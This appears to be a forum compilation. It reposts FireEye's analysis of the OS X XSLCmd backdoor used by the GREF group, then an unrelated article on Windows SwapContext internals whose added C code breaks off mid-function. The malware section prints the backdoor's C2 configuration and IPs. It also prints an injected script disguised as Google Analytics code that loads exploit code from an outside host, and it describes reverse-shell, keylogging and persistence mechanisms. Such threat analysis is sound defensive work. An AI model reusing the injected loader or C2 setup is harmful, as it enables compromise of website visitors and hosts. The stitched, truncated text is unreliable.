September 4, 2014 | By James T. Bennett and Mike Scott

Introduction

FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems. This backdoor shares a significant portion of its code with the Windows-based version of the XSLCmd backdoor that has been around since at least 2009. This discovery, along with other industry findings, is a clear indicator that APT threat actors are shifting their eyes to OS X as it becomes an increasingly popular computing platform.

Across the global threat landscape, there has been a clear history of leveraging (or porting) Windows malware to the Apple OS X platform. In 2012, AlienVault discovered a document file exploiting an older vulnerability in Microsoft Word that installs a backdoor named “MacControl” on OS X systems. The group responsible for those attacks had been targeting Tibetan non-government organizations (NGOs). It was later discovered that the code for this backdoor was borrowed from an existing Windows backdoor, whose source code can be found on several Chinese programming forums.

In 2013, Kaspersky reported on a threat actor group they named “IceFog” that had been attacking a large number of entities related to military, mass media, and technology in South Korea and Japan. This group developed their own backdoor for both Windows and OS X.

And just this year, Kaspersky published a report on a group they named “Careto/Mask” that utilized an open source netcat-like project designed to run on *nix and Windows systems named ‘sbd’ which they wrapped in a custom built installer for OS X.

Based on our historical intelligence, we believe the XSLCmd backdoor is used by APT, including a group that we call “GREF.” We track this threat group as “GREF” due to their propensity to use a variety of Google references in their activities – some of which will be outlined later in this report.
Our tracking of GREF dates back to at least the 2009 timeframe, but we believe they were active prior to this time as well. Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGOs, especially those with interests in Asia.

XSLCmd for OS X Analysis

The XSLCmd backdoor for OS X was submitted to VirusTotal (MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1) on August 10, 2014, with 0 detections at the time of submission. The sample is a universal Mach-O executable file supporting the PowerPC, x86, and x86-64 CPU architectures. The code within contains both an installation routine that is carried out the first time it is executed on a system, and the backdoor routine which is carried out after confirming that its parent process is launchd (the initial user mode process of OS X that is responsible for, amongst other things, launching daemons).

The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process. Its capabilities include a reverse shell, file listings and transfers, installation of additional executables, and an updatable configuration. The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing.

Installation Routine

To install, XSLCmd first determines the endianness of the CPU using NXGetLocalArchInfo and whether or not it is running as the super user by comparing the return value of getuid() with 0. The code includes functions to handle endianness differences when dealing with file and network data on a system using big endian, namely older Apple computers that shipped with PowerPC CPUs.
The process copies its Mach-O from its current location to $HOME/Library/LaunchAgents/clipboardd and creates a plist file in the same directory with the name com.apple.service.clipboardd.plist. The latter file ensures that the backdoor is launched after the system is rebooted, once the user logs in. After this is done, the malware relaunches itself using the ‘load’ option of the launchctl utility, which runs the malware according to its configuration in the plist file it created, with launchd as its parent process. This is the process that begins the actual backdoor routine of waiting for and executing commands issued from the C2 server. After running itself with launchctl, the initial process forks and deletes the Mach-O from the original location from which it was executed.

The installation routine differs slightly depending on whether or not the process is running with super user privileges. If run as super user, it copies itself to /Library/Logs/clipboardd. Interestingly, if run as super user, the process will also copy /bin/ksh to /bin/ssh. /bin/ksh is the Korn shell executable, and if the user sends a command to initialize a reverse shell, it will use the copy of ksh to do so instead of /bin/bash. This is likely done to make it less obvious that a reverse shell is running on the system, since it may raise less suspicion to see an ssh process opening a network socket rather than a bash process, although the real ssh executable is actually located in /usr/bin/ssh, not /bin/ssh. A list of possible files created by XSLCmd is included in Appendix 1 at the end of this blog.

Configuration Options

XSLCmd ships with an encrypted configuration file that it defaults to if there is no configuration file written to disk. It will only write its configuration file to disk if it’s updated by the user. It runs in a loop, checking for a configuration update, and then checking for commands.
If a new configuration is available, it will be written to disk in base64 encoding at $HOME/.fontset/pxupdate.ini. Below is the configuration data stored in the XSLCmd sample we obtained.

[CODE]
[ListenMode] 0
[MServer] 61.128.110.38:8000
[bServer] 61.128.110.38
[Day] 1,2,3,4,5,6,7
[start Time] 00:00:00
[End Time] 23:59:00
[interval] 60
[MWeb] http://1234/config.htm
[bWeb] http://1234/config.htm
[MWebTrans] 0
[bWebTrans] 0
[FakeDomain] www.appleupdate.biz
[Proxy] 0
[Connect] 1
[update] 0
[updateWeb] not use
[/CODE]

[MServer] and [bServer] specify the main and backup C2 server addresses, which can be either an IP address or domain name. Only [MServer] needs to specify a port. [Day] specifies which days of the week the malware will poll for commands and configuration updates, where Monday is 1. [start Time] specifies the local time of day to begin polling. [End Time] specifies the local time of day to stop polling. [interval] specifies the number of seconds between polls. [MWeb] and [bWeb] specify the main and backup URLs to poll for configuration updates, respectively. Update checks are not performed if these values are left at their default: http://1234/config.htm

Other options will be explained where appropriate later in the blog.

C2 Protocol

XSLCmd uses pseudo-HTTP for its protocol. It opens a socket and uses a string template to set up the HTTP request or response headers, depending on whether or not it was configured for [Listen Mode]. If [Listen Mode] is set to 1, then it listens on its socket, waiting for a connection to which it will reply with HTTP response headers following this template:

[CODE]
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Server: Apache/2.0.54 (Unix)
Content-Encoding: gzip
Content-Length: %d
[/CODE]

The body after the headers, regardless of mode, will contain data specific to the purpose of the communication.
The data is encrypted with a scheme lifted from a game server engine written by a group named “My Destiny Team.”

The request headers have an interesting feature where the Host and Referer header values will have their domain values populated with the value stored in [Fake Domain]. This value can be any string and has no effect on the network connection established. The value of the ‘s’ argument in the request URL is randomly generated, and all of the other request header values except for Content-Length are hard-coded.

Another interesting feature exists for the configuration update function. If [MWebTrans]/[bWebTrans] is set to 1, the configuration update URL request will be proxied through Yahoo’s Babelfish service and will fall back to the Google Translate service if that fails. As you can see, the ‘trurl’ parameter in the URL will be set to whatever is configured for [MWeb]/[bWeb]. The User-Agent header for this request is hard-coded and contains the computer name in the parentheses at the end.

SSL certificate strings were noticed during our analysis, but with no direct cross-reference to the certificate data. However, there was a cross-reference to the data directly preceding it. This data began with what looked like SSL handshake headers, so we extracted the data from the executable, wrapped it in a PCAP file, and opened it in Wireshark. Interestingly, the data contains everything needed for the server-side packets of an SSL handshake. The SSL certificate being used was for login.live.com and had expired on 6/16/2010. The code using this data opens a socket, waits for a connection, and proceeds to carry out an SSL handshake with the client, throwing away whatever data it receives. This code is not directly referenced by any other code in the executable but could very well replace the [Listen Mode] code. Perhaps it is an old feature no longer in use, a new feature yet to be fully implemented, or an optional feature only used in certain cases.
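The bracketed configuration format listed under Configuration Options above is simple enough to parse directly, which is useful when triaging a recovered pxupdate.ini or checking when a beacon should appear in network logs. The following is an added example, not FireEye's code: it parses the "[Key] value" records and evaluates the [Day]/[Start Time]/[End Time] polling schedule; the base64 layer is not modelled, the sample configuration is a constructed copy of the one listed above, and case-insensitive key matching is an assumption about the forum rendering ([start Time], [interval]) rather than about the malware.

```c
/* Added example, not FireEye's code: parses the "[Key] value" layout of XSLCmd's
 * configuration (the on-disk base64 layer is not modelled) and checks whether the
 * backdoor would be polling its C2 at a given weekday and time of day. Keys match
 * ignoring case since the copy above renders some inconsistently ([start Time]). */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char     mserver_host[64];
    int      mserver_port;
    unsigned day_mask;     /* bit (d-1) set when weekday d (Mon=1..Sun=7) polls */
    int      start_sec;    /* [Start Time] as seconds since local midnight, -1 if absent */
    int      end_sec;      /* [End Time] likewise */
    int      interval_sec; /* [Interval] seconds between polls */
} XslcmdConfig;

static bool key_eq(const char *a, const char *b) {   /* case-insensitive */
    for (; tolower((unsigned char)*a) == tolower((unsigned char)*b); a++, b++)
        if (*a == '\0') return true;
    return false;
}

static int parse_hms(const char *s) {
    int h, m, sec;
    return sscanf(s, "%d:%d:%d", &h, &m, &sec) == 3 ? h * 3600 + m * 60 + sec : -1;
}

static unsigned parse_days(const char *s) {
    unsigned mask = 0;
    for (; *s; s++)
        if (*s >= '1' && *s <= '7') mask |= 1u << (*s - '1');
    return mask;
}

/* Store one record; keys the model does not need are ignored. */
static void apply(XslcmdConfig *cfg, const char *key, const char *val) {
    if (key_eq(key, "MServer")) {
        const char *colon = strrchr(val, ':');
        size_t n = colon ? (size_t)(colon - val) : strlen(val);
        if (n >= sizeof cfg->mserver_host) n = sizeof cfg->mserver_host - 1;
        memcpy(cfg->mserver_host, val, n);
        cfg->mserver_host[n] = '\0';
        cfg->mserver_port = colon ? atoi(colon + 1) : 0;
    } else if (key_eq(key, "Day"))        cfg->day_mask = parse_days(val);
    else if (key_eq(key, "Start Time"))   cfg->start_sec = parse_hms(val);
    else if (key_eq(key, "End Time"))     cfg->end_sec = parse_hms(val);
    else if (key_eq(key, "Interval"))     cfg->interval_sec = atoi(val);
}

/* Each '[' opens a key, ']' closes it, and the value runs to the next '[' (or
 * the end of the text) with surrounding whitespace trimmed, so one-record-per-
 * line and run-together layouts parse identically. */
bool xslcmd_parse_config(const char *text, XslcmdConfig *cfg) {
    memset(cfg, 0, sizeof *cfg);
    cfg->start_sec = cfg->end_sec = -1;
    int records = 0;
    for (const char *p = strchr(text, '['); p; p = strchr(p, '[')) {
        const char *close = strchr(p, ']');
        if (!close) return false;                        /* unterminated key */
        char key[32], val[128];
        size_t klen = (size_t)(close - p - 1);
        if (klen >= sizeof key) return false;
        memcpy(key, p + 1, klen); key[klen] = '\0';
        const char *vs = close + 1;
        while (isspace((unsigned char)*vs)) vs++;
        const char *ve = strchr(vs, '[');
        if (!ve) ve = vs + strlen(vs);
        while (ve > vs && isspace((unsigned char)ve[-1])) ve--;
        size_t vlen = (size_t)(ve - vs);
        if (vlen >= sizeof val) return false;
        memcpy(val, vs, vlen); val[vlen] = '\0';
        apply(cfg, key, val);
        records++;
        p = ve;
    }
    return records > 0;
}

/* Inside the polling window? weekday 1 (Mon)..7 (Sun), secs since local
 * midnight; both window ends inclusive, a modelling assumption. */
bool xslcmd_polls_at(const XslcmdConfig *cfg, int weekday, int secs) {
    if (weekday < 1 || weekday > 7) return false;
    if (!(cfg->day_mask & (1u << (weekday - 1)))) return false;
    if (cfg->start_sec < 0 || cfg->end_sec < 0) return false;
    return secs >= cfg->start_sec && secs <= cfg->end_sec;
}

/* Constructed sample reproducing the configuration listed above. */
const char XSLCMD_SAMPLE_CONFIG[] =
    "[ListenMode] 0 [MServer] 61.128.110.38:8000 [bServer] 61.128.110.38 "
    "[Day] 1,2,3,4,5,6,7 [start Time] 00:00:00 [End Time] 23:59:00 "
    "[interval] 60 [MWeb] http://1234/config.htm [bWeb] http://1234/config.htm "
    "[MWebTrans] 0 [bWebTrans] 0 [FakeDomain] www.appleupdate.biz "
    "[Proxy] 0 [Connect] 1 [update] 0 [updateWeb] not use";
```

With the sample above, xslcmd_parse_config yields C2 61.128.110.38:8000, a day mask covering all seven days and a 00:00:00 to 23:59:00 window, so xslcmd_polls_at reports polling at any weekday and time except the last minute of the day.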
Observations

We noticed a mix of manually constructed and plain referenced strings throughout the code, sometimes even side by side in the same function. This gives the impression of someone working with someone else’s code, adding his own touch and style here and there as he goes.

Also of note is that XSLCmd will not perform key logging if run as super user. This can be a problem, because the API used to perform the key logging, CGEventTapCreate, when invoked with the parameters it uses, requires root permissions from the calling process, or the “Assistive Devices” feature must be enabled for the application. During the initial installation, there is a routine to programmatically enable assistive devices that will be executed if the OS X version is not 10.8. In 10.9, enabling assistive devices permissions is done on a per-application basis with no direct API to achieve this. It is interesting to note that the version check does not account for versions above 10.8, indicating that perhaps 10.8 was the latest version at the time the code was written, or at least the most common. Further supporting this inference is the lack of testing performed on 10.9. This variant uses an API from the private Admin framework that is no longer exported in 10.9, causing it to crash.

The effort to support PowerPC with the endian conversion functions is worth mentioning. Coupling this observation with the aforementioned fact that elsewhere in the code the version of OS X is compared with 10.8, one could deduce that efforts were made to be backwards compatible with older OS X systems. For some frame of reference, Apple’s first OS to drop support for PowerPC was OS X 10.6, released in 2009, and OS X 10.9 was released in October of 2013.

Threat Actor Intelligence

Historical Background

While GREF’s targeting interests overlap with many of the other threat groups we track, their TTPs are somewhat unique.
GREF is one of the few APT threat groups that does not rely on phishing as their primary attack method. While they have been known to utilize phishing emails, including malicious attachments and links to exploit sites, they were one of the early adopters of strategic web compromise (SWC) attacks.

GREF was especially busy in the 2010 timeframe, during which they had early access to a number of 0-day exploits including CVE-2010-0806 (IE 6-7 Peer Objects vuln), CVE-2010-1297 (Adobe Flash vuln), and CVE-2010-2884 (Adobe Flash) that they leveraged in both phishing and SWC attacks. Many of their SWC attacks we saw in this time period were hosted on defense industry-related sites including Center for Defense Information (cdi.org), National Defense Industrial Association (ndia.org), Interservice/Industry Training, Simulation and Education Conference (iitsec.org), and satellite company Millennium Space Systems (millennium-space.com). Most of those attacks involved embedding links to exploit code in the homepage of the affected website, and true to their moniker the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did.

Figure 1: Sample "google" exploit link

[CODE]
<!-- Google Tracking Code -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://");
document.write(unescape("%3Cscript src='" + gaJsHost + "180.149.252.181/wiki/tiwiki.ashx' type='text/javascript'%3E%3C/script%3E"));
</script>
[/CODE]

The TTP that most differentiates GREF from other APT threat groups is their unrelenting targeting of web server vulnerabilities to both gain entry to targeted organizations, as well as to get new platforms for SWC attacks.
This threat group appears to devote more resources (than most other groups) to attempting to penetrate web servers, and generally they make no attempt to obscure the attacks, often generating gigabytes of traffic in long-running attacks. They are known to utilize open-source tools such as SQLMap to perform SQL injection, but their most obvious tool of choice is the web vulnerability scanner Acunetix, which leaves tell-tale request patterns in web server logs. They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system.

Another historical TTP attributed to GREF was their frequent re-use of specific IP ranges to both perform reconnaissance and launch their attacks, as well as for command and control and exfiltration of data. In the early years, we documented them routinely using IP addresses in the 210.211.31.x (China Virtual Telecom – Hong Kong), 180.149.252.x (Asia Datacenter – Hong Kong), and 120.50.47.x (Qala – Singapore) ranges. In addition, their reconnaissance activities frequently included referrer headers from google.com and google.com.hk with search features such as “inurl” and “filetype” looking for specific systems, technologies, and known vulnerabilities.

C2 Domains

GREF is known to have sometimes configured their malware with bare IP addresses rather than domains, but there are some clusters of domain registrants that we attribute to them.
Table 1: GREF domain registrations

XSLCmd Usage

For the majority of the time we’ve been tracking them, XSLCmd has been the “go-to” backdoor for GREF, as shown by the wide range of compile dates for the Windows samples we have: from 2009-01-05 to 2013-08-01. Appendix 2 provides a partial list of Windows sample hashes and configuration metadata.

Since Mach-O binaries do not have a compile timestamp like Windows executables, we can only infer from other data when the OS X variant was developed. As mentioned above, the “FakeDomain” was configured to “www.appleupdate[.]biz”, which was originally registered on August 2, 2012, and the registration appears to have been updated on August 7, 2014, but the registrant is still the same “cast west”. When we found the sample on August 10, the domain did not resolve and there were no historical records for appleupdate[.]biz in any of the passive DNS (pDNS) sources we checked. In the intervening weeks, it has been seen by pDNS sensors, with the first query occurring on August 12, 2014 (which could be related to our research, since the hits are ‘nxdomain’), and then on August 16, 2014 there are pDNS records pointing to 61.128.110.38, which you’ll notice is the same IP the OS X version was configured to use. This could hint at the possibility that this OS X port of XSLCmd was recently developed and deployed; however, this remains uncertain.

Other Backdoor Usage

In addition to XSLCmd, GREF has utilized a number of other backdoors over time.
Another backdoor unique to them, which we call “ddrh”, is a limited-feature backdoor that was frequently dropped in the SWC attacks in 2010, but has not been seen much since.

Another historical backdoor attributed to GREF is one known as ERACS or Trojan.LURKER (not to be confused with the LURK0 variant of Gh0st). This full-featured backdoor includes the usual backdoor functionality, including support for additional modules, but it also includes a USB monitoring capability that generates a directory listing of USB-connected devices.

We have also observed GREF using a handful of other common backdoors including Poison Ivy, Gh0st, 9002/HOMEUNIX, HKDoor, and Briba, but these occurrences have been pretty rare. All of the GREF 9002/HOMEUNIX samples in our repository have compile dates from 2009 or 2010. Interestingly enough, there is some overlap with a cluster detailed in a report we released in November of last year, specifically the “AllShell” cluster (C2: smtp.allshell[.]net).

Starting in mid-2012, GREF started using the Kaba/SOGU backdoor. These early samples, which were discussed in great detail by LastLine in their blog post “An Analysis of PlugX,” are usually bundled into a RAR self-extracting executable and use the three-part loading mechanism consisting of an executable, the malicious DLL that is side-loaded, and the shellcode file. In mid-2013, GREF switched to using a new Kaba/SOGU builder that created binaries with unique metadata. For example, many of these samples create a mutex of “PST-2.0” when executed, and some have the shared “HT Applications” version metadata.
Conclusion

The “A” in APT is generally used to describe the threat actors as “Advanced”, but with this blog we see that they are also “Adaptable.” Not only have they adopted new Windows-based backdoors over time; as Apple’s OS X platform has increased in popularity in many companies, they have logically adapted their toolset to match, in order to gain and maintain a persistent foothold in the organizations they are targeting.

OS X has gained popularity across enterprises, from less savvy users who find it easy to operate, to highly technical users that utilize its more powerful features, as well as with executives. Many people also consider it to be a more secure computing platform, which may lead to a dangerous sense of complacency in both IT departments and with users. In fact, while the security industry has started offering more products for OS X systems, these systems are sometimes less regulated and monitored in corporate environments than their Windows peers. Clearly, as the OS X platform becomes more widely adopted across enterprises, threat groups like GREF will continue to adapt and find ways to exploit that platform.

Credit to Jay Smith for his initial analysis of the Windows version of the XSLCmd backdoor and Joshua Homan for his assistance in this research.
Appendix 1: XSLCmd for OS X created files

[TABLE=width: 100%]
[TR] [TD=width: 56%]Filename[/TD] [TD=width: 43%]Purpose[/TD] [/TR]
[TR] [TD=width: 56%]$HOME/Library/LaunchAgents/clipboardd[/TD] [TD=width: 43%]executable[/TD] [/TR]
[TR] [TD=width: 56%]/Library/Logs/clipboardd[/TD] [TD=width: 43%]executable when run as super user[/TD] [/TR]
[TR] [TD=width: 56%]$HOME/Library/LaunchAgents/com.apple.service.clipboardd.plist[/TD] [TD=width: 43%]plist for persistence[/TD] [/TR]
[TR] [TD=width: 56%]$HOME/.fontset/pxupdate.ini[/TD] [TD=width: 43%]configuration file[/TD] [/TR]
[TR] [TD=width: 56%]$HOME/.fontset/chkdiska.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR]
[TR] [TD=width: 56%]$HOME/.fontset/chkdiskc.dat[/TD] [TD=width: 43%]additional configuration file[/TD] [/TR]
[TR] [TD=width: 56%]$HOME/Library/Logs/BackupData/<year><month><day>_<hr>_<min>_<sec>_keys.log[/TD] [TD=width: 43%]key log file[/TD] [/TR]
[/TABLE]

Source: Forced to Adapt: XSLCmd Backdoor Now on OS X | FireEye Blog
-
Windows Internals - A look into SwapContext routine

Hi,

Here I am really taking advantage of my summer vacations and back again with a second part of the Windows thread scheduling articles. In the previous blog post I discussed the internals of quantum end context switching (a flowchart). However, the routine responsible for context switching itself wasn't discussed in detail and that's why I'm here today.

Here are some notes that'll help us through this post:

1 - The routine which contains the code that does context switching is SwapContext, and it's called internally by KiSwapContext. Some routines prefer to call SwapContext directly and do the housekeeping that KiSwapContext does themselves.

2 - The routines above (KiSwapContext and SwapContext) are involved in ALL context switches that are performed, no matter the reason for the context switch (preemption, wait state, termination...).

3 - SwapContext is originally written in assembly and it doesn't have the prologue or epilogue normally seen in ordinary calling conventions; imagine it like a naked function.

4 - Neither SwapContext nor KiSwapContext is responsible for setting the CurrentThread and NextThread fields of the current KPRCB. It is the responsibility of the caller to store the new thread's KTHREAD pointer into pPrcb->CurrentThread and to queue the current thread (we're still running in its context) in the ready queue before calling KiSwapContext or SwapContext, which will actually perform the context switch. Usually, before calling KiSwapContext, the old IRQL (before raising it to DISPATCH_LEVEL) is stored in CurrentThread->WaitIrql, but there's an exception discussed later in this article.

So buckle up and let's get started:

Before digging through SwapContext let's first start by examining what its callers supply to it as arguments. SwapContext expects the following arguments:

- ESI : (PKTHREAD) A pointer to the new thread's structure.
- EDI : (PKTHREAD) A pointer to the old thread's structure.
- EBX : (PKPCR) A pointer to the PCR (Processor Control Region) structure of the current processor.
- ECX : (KIRQL) The IRQL at which the thread was running before raising it to DISPATCH_LEVEL.

By callers, I mean the KiSwapContext routine and some routines that call SwapContext directly (e.g. KiDispatchInterrupt).

Let's start by seeing what's happening inside KiSwapContext:

This routine expects 2 arguments, the current thread and new thread KTHREAD pointers, in ECX and EDX respectively (__fastcall). Before storing both arguments in EDI and ESI, it first proceeds to save these and other registers on the current thread's (soon to be the old thread's) stack:

EBP : The stack frame base pointer (SwapContext only updates ESP).
EDI : The caller might be using EDI for something else, save it.
ESI : The caller might be using ESI for something else, save it too.
EBX : The caller might be using EBX for something else, save it too.

Note that these registers will be popped from this same thread's stack when the context is switched from another thread back to this thread at a later time (when it is rescheduled to run).

After pushing the registers, KiSwapContext stores the self pointer to the PCR in EBX (fs:[1Ch]). Then it stores the CurrentThread->WaitIrql value in ECX; now that everything is set up, KiSwapContext is ready to call SwapContext.

Again, before going through SwapContext let me talk about routines that call SwapContext directly, specifically the KiDispatchInterrupt routine that was referenced in my previous post. Why doesn't KiDispatchInterrupt call KiSwapContext? Simply because it just needs to push EBP, EDI and ESI onto the current thread's stack, as it already uses EBX as a pointer to the PCR. Here we can see a real advantage of software context switching: we save only the registers that we really need to save, not all of them.

Now, we can get to SwapContext and explain what it does in detail.
The return type of SwapContext is a boolean value that tells the caller (on the new thread's stack) whether the new thread has any APCs to deliver or not. Let's see what SwapContext does in these 15 steps:

1 - The first thing SwapContext does is verify that the new thread isn't actually running; this only matters on a multiprocessor system, where another processor might actually be running the thread. If the new thread is running, SwapContext just loops until the thread stops running. The boolean value checked is NewThread->Running, and after getting out of the loop, Running is immediately set to TRUE.

2 - The next thing SwapContext does is push the IRQL value supplied in ECX. To spoil a bit of what's coming in the next steps (step 13), SwapContext itself pops ECX later, but after the context switch. As a result we'll be popping the new thread's pushed IRQL value (the stack has been switched).

3 - Interrupts are disabled, and the PRCB cycle time fields are updated with the value of the time-stamp counter. After the update, interrupts are enabled again.

4 - Increment the count of context switches in the PCR (Pcr->ContextSwitches++), and push Pcr->Used_ExceptionList, which is the first element of the PCR (fs:[0]). fs:[0] is actually a pointer to the last registered exception handling frame, which contains a pointer to the next frame and also a pointer to the handling routine (similar to user mode): simply a singly linked list. Saving the exception list is important as each thread has its own stack and thus its own exception handling list.

5 - OldThread->NpxState is tested; if it's non-NULL, SwapContext proceeds to save the floating-point registers and FPU-related data using the fxsave instruction.
The location where this data is saved is in the initial stack, exactly at (initial stack pointer - 528 bytes). The fxsave output is 512 bytes long, so it's like pushing 512 bytes onto the initial stack; the other 16 bytes are for stack alignment, I suppose. The initial stack is discussed later, in step 8.

6 - Stack swapping: save the stack pointer in OldThread->KernelStack and load NewThread->KernelStack into ESP. We're now running on the new thread's stack; from now on every value we pop was previously pushed the last time the new thread was preparing for a context switch.

7 - Virtual address space swapping: the old thread's process is compared with the new thread's process; if they're different, the CR3 register (page directory pointer table register) is updated with the value of NewThread->ApcState.Process->DirectoryTableBase. As a result, the new thread will have access to a valid virtual address space. If the process is the same, CR3 is kept unchanged. The local descriptor table is also changed if the threads' processes are different.

8 - TSS Esp0 switching: even though I'll dedicate a future post to discussing the TSS (task state segment) in detail under Windows, a brief explanation is needed here. Windows uses only one TSS per processor and uses only the ESP0 and SS0 fields (another field is also used, but it is out of the scope of this article), which stand for the kernel stack pointer and the kernel stack segment respectively. When a user-mode to kernel-mode transition must be done as a result of an interrupt, exception or system service call, as part of the transition ESP must be changed to point to the kernel stack; this kernel stack pointer is taken from the TSS's ESP0 field. Logically speaking, the ESP0 field of the TSS must be changed on every context switch to the kernel stack pointer of the new thread.
In order to do so, SwapContext takes the kernel stack pointer at NewThread->InitialStack (InitialStack = StackBase - 0x30), subtracts the space it has used to save the floating-point registers with the fxsave instruction plus another 16 bytes for stack alignment, then stores the resulting stack pointer in the TSS's Esp0 field: pPcr->TssCopy.Esp0 (the TSS can also be accessed using the TR segment register).

9 - We've completed the context switch now, and the old thread can finally be marked as "stopped running" by setting the previously discussed boolean "Running" to FALSE: OldThread->Running = FALSE.

10 - If fxsave was previously executed by the new thread (the last time its context was switched out), the data it saved (floating-point registers, ...) is loaded again using the xrstor instruction.

11 - Next, the TEB (Thread Environment Block) pointer is updated in the PCR: pPcr->Used_Self = NewThread->Teb. So the Used_Self field of the PCR always points to the current thread's TEB.

12 - The new thread's context switch count is incremented (NewThread->ContextSwitches++).

13 - It's finally time to pop the 2 values that SwapContext pushed, the pointer to the exception list and the IRQL, from the new thread's stack. The saved IRQL value is restored into ECX and the exception list pointer is popped into its field in the PCR.

14 - A check is done to see if the context switch was performed from a DPC routine (entering a wait state, for example), which is prohibited. If the pPrcb->DpcRoutineActive boolean is TRUE, this means the current processor is currently executing a DPC routine, and SwapContext will immediately call KeBugCheck, which will show a BSOD: ATTEMPTED_SWITCH_FROM_DPC.

15 - This is the step where the IRQL value (NewThread->WaitIrql) stored in ECX comes into use. As mentioned earlier, SwapContext returns a boolean value telling the caller whether it has to deliver any pending APCs.
During this step SwapContext will check the new thread's ApcState to see if there are any kernel APCs pending. If there are : a second check is performed to see if special kernel APCs are disabled , if they're not disabled ECX is tested to see if it's PASSIVE_LEVEL, if it is above PASSIVE_LEVEL an APC_LEVEL software interrupt is requested and the function returns FALSE. Actually the only case that SwapContext returns TRUE is if ECX is equal to PASSIVE_LEVEL so the caller will proceed to lowering IRQL to APC_LEVEL first to call KiDeliverApc and then lower it to PASSIVE_LEVEL afterwards. Special Case : This special case is actually about the IRQL value supplied to SwapContext in ECX. The nature of this value depends on the caller in such way that if the caller will lower the IRQL immediately upon returning from SwapContext or not. Let's take 2 examples : KiQuantumEnd and KiExitDispatcher routines. (KiQuantumEnd is the special case) If you disassemble KiExitDispatcher you'll notice that before calling KiSwapContext it stores the OldIrql (before it was raised to DISPATCH_LEVEL) in the WaitIrql of the old thread so when the thread gains execution again at a later time SwapContext will decide whether there any APCs to deliver or not. KiExitDispatcher makes use of the return value of KiSwapContext (KiSwapContext returns the same value returned by SwapContext) to lower the IRQL. (see step 15 last sentence). However, by disassembling KiQuantumEnd you'll see that it's storing APC_LEVEL at the old thread's WaitIrql without even caring about in which IRQL the thread was running before. 
If you refer back to my flowchart in the previous article you'll see that KiQuantumEnd always insures that SwapContext returns FALSE , first of all because KiQuantumEnd was called as a result of calling KiDispatchInterrupt which is meant to be called when a DISPATCH_LEVEL software interrupt was requested.Thus, KiDispatchInterrupt was called by HalpDispatchSoftwareInterrupt which is normally called by HalpCheckForSoftwareInterrupt. HalpDispatchSoftwareInterrupt is the function responsible for raising the IRQL to the software interrupt level (APC_LEVEL or DISPATCH_LEVEL) and upon returning from it HalpCheckForSoftwareInterrupt recovers back the IRQL to its original value (OldIrql). So the reason why KiQuantumEnd doesn't care about KiSwapContext return value because it won't proceed to lowering the IRQL (not its responsibility) nor to deliver any APCs that's why it's supplying APC_LEVEL as an old IRQL value to SwapContext so that it will return FALSE. However, a software interrupt might be requested by SwapContext if there are any pending APCs. KiDispatchInterrupt which calls SwapContext directly uses the same approach as KiQuantumEnd, instead of storing the value at OldThread->WaitIrql it just moves it into ECX. Post notes : - Based on Windows 7 32 bit :> - For any questions or suggestions feel free to leave a comment below or send me an email : souhail.hammou@outlook.com See you again soon -Souhail Sursa: Reverse Engineering 0x4 Fun: Windows Internals - A look into SwapContext routine
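The two pieces of SwapContext logic that are easiest to get wrong when reading the disassembly are the step 15 APC decision (including why the APC_LEVEL that KiQuantumEnd stores in WaitIrql forces a FALSE return) and the step 8 Esp0 arithmetic. The C below models both as an added example; it is not code from the article or from Windows. The ModelThread and SwapResult types, the field set, and the sample stack base 0x9C000000 are assumptions made for the illustration; only the field names and constants the article cites (KernelApcPending, SpecialApcDisable, WaitIrql, InitialStack = StackBase - 0x30, the 512 + 16 byte fxsave area) come from the text.

```c
/* Added illustration: a model of two SwapContext steps (8 and 15) as described
 * in the article. Not Windows code; ModelThread mirrors only the fields the
 * article names, and all sample values are constructed. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define PASSIVE_LEVEL  0   /* x86 IRQL values */
#define APC_LEVEL      1
#define DISPATCH_LEVEL 2

#define FXSAVE_AREA_SIZE     512  /* bytes written by fxsave before the switch */
#define FXSAVE_ALIGN_PAD      16  /* extra bytes for 16-byte stack alignment */
#define INITIAL_STACK_OFFSET 0x30 /* InitialStack = StackBase - 0x30 (step 8) */

/* Hypothetical stand-in for the new thread as SwapContext sees it. */
typedef struct {
    bool      KernelApcPending;   /* ApcState.KernelApcPending */
    int16_t   SpecialApcDisable;  /* non-zero: special kernel APCs disabled */
    uint8_t   WaitIrql;           /* IRQL saved by the caller; reaches SwapContext in ECX */
    uintptr_t StackBase;          /* top of the thread's kernel stack */
} ModelThread;

typedef struct {
    bool deliver_apcs;            /* SwapContext's boolean return value */
    bool apc_interrupt_requested; /* an APC_LEVEL software interrupt was requested */
} SwapResult;

/* Step 15: decide how pending kernel APCs of the new thread are handled. */
SwapResult swap_context_apc_check(const ModelThread *nt)
{
    SwapResult r = { false, false };
    if (!nt->KernelApcPending)      return r;  /* nothing pending */
    if (nt->SpecialApcDisable != 0) return r;  /* special kernel APCs disabled */
    if (nt->WaitIrql == PASSIVE_LEVEL) {
        r.deliver_apcs = true;   /* caller lowers to APC_LEVEL and calls KiDeliverApc */
        return r;
    }
    /* Above PASSIVE_LEVEL (e.g. the APC_LEVEL KiQuantumEnd stores in WaitIrql):
     * delivery is deferred to a software interrupt and FALSE is returned. */
    r.apc_interrupt_requested = true;
    return r;
}

/* Step 8: InitialStack derived from StackBase, then the Esp0 written to the TSS. */
uintptr_t initial_stack_of(const ModelThread *t)
{
    return t->StackBase - INITIAL_STACK_OFFSET;
}

uintptr_t tss_esp0_for(const ModelThread *t)
{
    return initial_stack_of(t) - FXSAVE_AREA_SIZE - FXSAVE_ALIGN_PAD;
}

int main(void)
{
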